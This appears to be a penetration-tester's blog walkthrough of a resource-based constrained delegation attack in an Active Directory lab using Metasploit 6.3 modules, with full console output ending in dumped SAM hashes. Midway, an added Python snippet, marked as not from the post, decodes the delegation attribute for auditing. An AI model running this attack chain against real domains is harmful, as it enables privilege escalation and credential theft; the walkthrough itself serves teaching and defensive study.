Metasploit recently released version 6.3. With it came a whole lot of new features related to LDAP operations and using Kerberos authentication.
In this blog I want to demonstrate how to perform a GenericWrite -> RBCD attack, which I find is very common. Oftentimes a user will not have administrative access to a computer, but will have GenericWrite privileges or equivalent (GenericAll, Owns, etc.) over the computer object. By exploiting this configuration it is possible to gain admin access on the computer. There are two main ways to perform this attack currently: either by using a combination of Rubeus/Powermad/PowerView, or by using various scripts within Impacket.
To explain some of the new features, I will compare the modules within Metasploit to their Impacket counterparts.
First, to perform this attack you will need a computer account. If you do not have one under your control already, you will need to create one. In Impacket we would use addcomputer.py, but here we will use auxiliary/admin/dcerpc/samr_computer.
msf6 auxiliary(admin/dcerpc/samr_computer) > show options

Module options (auxiliary/admin/dcerpc/samr_computer):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   COMPUTER_NAME                       no        The computer name
   RHOSTS             172.16.73.6      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT              445              yes       The target port (TCP)
   SMBDomain          n00py.local      no        The Windows domain to use for authentication
   SMBPass            Password1        no        The password for the specified username
   SMBUser            n00py            no        The username to authenticate as

   When ACTION is ADD_COMPUTER:

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   COMPUTER_PASSWORD                   no        The password for the new computer

Auxiliary action:

   Name          Description
   ----          -----------
   ADD_COMPUTER  Add a computer account

View the full module info with the info, or info -d command.

msf6 auxiliary(admin/dcerpc/samr_computer) > run

[*] Running module against 172.16.73.6
[+] 172.16.73.6:445 - Successfully created n00py.local\DESKTOP-MKFA61G6$
[+] 172.16.73.6:445 - Password: 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj
[+] 172.16.73.6:445 - SID: S-1-5-21-3387312503-3460017432-368973690-1135
[*] Auxiliary module execution completed
Once we have a new computer account, we then have to configure delegation rights on the victim computer. With Impacket we would use rbcd.py, but here we will use auxiliary/admin/ldap/rbcd. Its read action shows the current contents of msDS-AllowedToActOnBehalfOfOtherIdentity on the target, and its write action adds our computer account to it.
msf6 auxiliary(admin/ldap/rbcd) > show options

Module options (auxiliary/admin/ldap/rbcd):

   Name           Current Setting    Required  Description
   ----           ---------------    --------  -----------
   DELEGATE_FROM  DESKTOP-MKFA61G6$  no        The delegation source
   DELEGATE_TO    WIN-27M967MQJL4$   yes       The delegation target
   DOMAIN         n00py.local        no        The domain to authenticate to
   PASSWORD       Password1          no        The password to authenticate with
   RHOSTS         172.16.73.6        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          389                yes       The target port
   SSL            false              no        Enable SSL on the LDAP connection
   USERNAME       n00py              no        The username to authenticate with

View the full module info with the info, or info -d command.

msf6 auxiliary(admin/ldap/rbcd) > read

[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
[*] Auxiliary module execution completed

msf6 auxiliary(admin/ldap/rbcd) > write

[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
[*] Added account:
[*]   S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed

msf6 auxiliary(admin/ldap/rbcd) > read

[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] Allowed accounts:
[*]   S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed
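What the write action stores, and what read decodes back to SIDs, is a self-relative NT security descriptor whose DACL grants the delegating account an access-allowed ACE. The following is an added example (my own code, not from the post or from Metasploit) of how a defender auditing computer objects can decode that attribute value and list every principal allowed to delegate; the descriptor is constructed inline from the SID shown above rather than fetched from a directory, and the 0xF01FF mask is the one RBCD tooling commonly writes.

```python
import struct

SE_SELF_RELATIVE, SE_DACL_PRESENT = 0x8000, 0x0004
ACE_NAMES = {0x00: "allow", 0x01: "deny"}   # ACCESS_ALLOWED_ACE / ACCESS_DENIED_ACE

def parse_sid(buf, off):
    """Decode a binary SID at buf[off:]; return (sid_string, byte_length)."""
    rev, subcount = buf[off], buf[off + 1]
    if rev != 1:
        raise ValueError("unsupported SID revision %d" % rev)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")       # 48-bit, big-endian
    subs = struct.unpack_from("<%dI" % subcount, buf, off + 8)     # 32-bit, little-endian
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * subcount

def delegation_entries(sd):
    """Walk the DACL of a self-relative security descriptor (the value stored in
    msDS-AllowedToActOnBehalfOfOtherIdentity) and return (type, sid, mask) per ACE."""
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("not a self-relative security descriptor")
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []                                   # no DACL: nobody may delegate
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    entries, pos = [], off_dacl + 8                # ACL header is 8 bytes
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type in ACE_NAMES:                   # skip object/callback ACE variants
            mask, = struct.unpack_from("<I", sd, pos + 4)
            entries.append((ACE_NAMES[ace_type], parse_sid(sd, pos + 8)[0], mask))
        pos += ace_size                             # AceSize covers header + mask + SID
    return entries

# --- constructed sample input, not captured from a real directory ---
def build_sid(sid):
    parts = [int(p) for p in sid.split("-")[1:]]    # drop the leading "S"
    rev, auth, subs = parts[0], parts[1], parts[2:]
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def build_sample_sd(sids, mask=0x000F01FF):
    aces = b"".join(struct.pack("<BBHI", 0x00, 0, 8 + len(s), mask) + s for s in map(build_sid, sids))
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces
    # SD header is 20 bytes; owner/group/SACL offsets left at 0, DACL follows the header
    return struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, 0, 0, 0, 20) + acl

SAMPLE_SD = build_sample_sd(["S-1-5-21-3387312503-3460017432-368973690-1135"])

if __name__ == "__main__":
    for kind, sid, mask in delegation_entries(SAMPLE_SD):
        print(kind, sid, hex(mask))     # any SID you did not expect here is a finding
```

In a real audit the bytes passed to delegation_entries come from an LDAP query for computers where msDS-AllowedToActOnBehalfOfOtherIdentity is present; the decoded SIDs then get resolved and compared against the list of accounts that are supposed to delegate to that host.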
Once we have configured delegation, we can then request a service ticket for any user. With Impacket we would use getST.py, but here we will use auxiliary/admin/kerberos/get_ticket. We will want to use the final service ticket saved by Metasploit.
msf6 auxiliary(admin/kerberos/get_ticket) > show options

Module options (auxiliary/admin/kerberos/get_ticket):

   Name           Current Setting                   Required  Description
   ----           ---------------                   --------  -----------
   AES_KEY                                          no        The AES key to use for Kerberos authentication in hex string. Supported keys: 128 or 256 bits
   CERT_FILE                                        no        The PKCS12 (.pfx) certificate file to authenticate with
   CERT_PASSWORD                                    no        The certificate file's password
   DOMAIN         n00py.local                       no        The Fully Qualified Domain Name (FQDN). Ex: mydomain.local
   NTHASH                                           no        The NT hash in hex string. Server must support RC4
   PASSWORD       7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj  no        The domain user's password
   RHOSTS         172.16.73.6                       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          88                                yes       The target port
   Timeout        10                                yes       The TCP timeout to establish Kerberos connection and read data
   USERNAME       DESKTOP-MKFA61G6$                 no        The domain user

   When ACTION is GET_TGS:

   Name         Current Setting                   Required  Description
   ----         ---------------                   --------  -----------
   IMPERSONATE  Administrator                     no        The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket)
   SPN          CIFS/WIN-27M967MQJL4.n00py.local  no        The Service Principal Name, format is service_name/FQDN. Ex: cifs/dc01.mydomain.local

Auxiliary action:

   Name     Description
   ----     -----------
   GET_TGS  Request a Ticket-Granting-Service (TGS)

View the full module info with the info, or info -d command.

msf6 auxiliary(admin/kerberos/get_ticket) > set verbose true
verbose => true
msf6 auxiliary(admin/kerberos/get_ticket) > run

[*] Running module against 172.16.73.6
[+] 172.16.73.6:88 - Received a valid TGT-Response
[*] 172.16.73.6:88 - TGT MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_994901.bin
[*] 172.16.73.6:88 - Getting TGS impersonating Administrator@n00py.local (SPN: CIFS/WIN-27M967MQJL4.n00py.local)
[+] 172.16.73.6:88 - Received a valid TGS-Response
[*] 172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_606526.bin
[+] 172.16.73.6:88 - Received a valid TGS-Response
[*] 172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin
[*] Auxiliary module execution completed
Finally, once we have this ticket we can perform admin actions on the target. Typically a pentester would use Impacket's secretsdump.py or CrackMapExec (which is the same thing under the hood) to recover credentials from the system. We can use Metasploit's auxiliary/gather/windows_secrets_dump module to do this instead; it is the equivalent of running CrackMapExec with both --sam and --lsa. The only tricky part is making it work with Kerberos authentication, which requires going into the advanced options.
msf6 auxiliary(gather/windows_secrets_dump) > show options

Module options (auxiliary/gather/windows_secrets_dump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     172.16.73.12     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      445              yes       The target port (TCP)
   SMBDomain  n00py.local      no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser    Administrator    no        The username to authenticate as

Auxiliary action:

   Name  Description
   ----  -----------
   ALL   Dump everything

View the full module info with the info, or info -d command.

msf6 auxiliary(gather/windows_secrets_dump) > show advanced

Module advanced options (auxiliary/gather/windows_secrets_dump):

   Name                            Current Setting                                   Required  Description
   ----                            ---------------                                   --------  -----------
   [TRUNCATED]
   SMB::Auth                       kerberos                                          yes       The Authentication mechanism to use (Accepted: auto, ntlm, kerberos)
   [TRUNCATED]

   Active when SMB::Auth is kerberos:

   Name                            Current Setting                                   Required  Description
   ----                            ---------------                                   --------  -----------
   DomainControllerRhost           WIN-NDA9607EHKS.n00py.local                       no        The resolvable rhost for the Domain Controller
   KrbCacheMode                    read-write                                        yes       Kerberos ticket cache storage mode (Accepted: none, read-only, write-only, read-write)
   SMB::Krb5Ccname                 /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin  no  The ccache file to use for kerberos authentication
   SMB::KrbOfferedEncryptionTypes  AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1  yes       Kerberos encryption types to offer
   SMB::Rhostname                  WIN-27M967MQJL4.n00py.local                       no        The rhostname which is required for kerberos - the SPN

View the full module info with the info, or info -d command.

msf6 auxiliary(gather/windows_secrets_dump) > run

[*] Running module against 172.16.73.12
[*] 172.16.73.12:445 - Opening Service Control Manager
[*] 172.16.73.12:445 - Binding to \svcctl...
[+] 172.16.73.12:445 - Bound to \svcctl
[*] 172.16.73.12:445 - Service RemoteRegistry is in stopped state
[*] 172.16.73.12:445 - Starting service...
[*] 172.16.73.12:445 - Retrieving target system bootKey
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\JD
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\Skew1
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\GBG
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\Data
[+] 172.16.73.12:445 - bootKey: 0x1a9c42b4c664bb5ab1c699858559fc76
[*] 172.16.73.12:445 - Checking NoLMHash policy
[*] 172.16.73.12:445 - LMHashes are not being stored
[*] 172.16.73.12:445 - Saving remote SAM database
[*] 172.16.73.12:445 - Create SAM key
[*] 172.16.73.12:445 - Save key to PUnE0CMU.tmp
[*] 172.16.73.12:445 - Dumping SAM hashes
[*] 172.16.73.12:445 - Calculating HashedBootKey from SAM
[*] 172.16.73.12:445 - Password hints:
No users with password hints on this system
[*] 172.16.73.12:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b0abb98152c261c4c23429ed9eecc117:::
[TRUNCATED]
[*] Auxiliary module execution completed
Sweet, creds! This is just a lab system, but were it a live target we would likely find quite a few juicy credentials we could re-use elsewhere. There are of course a lot more post-exploitation options you could perform with Metasploit, but the goal here is just to demonstrate how to use modules with a service ticket and Kerberos authentication.
Will this replace Impacket for me? Not likely, but I’m always a fan of having more tools in my toolbox.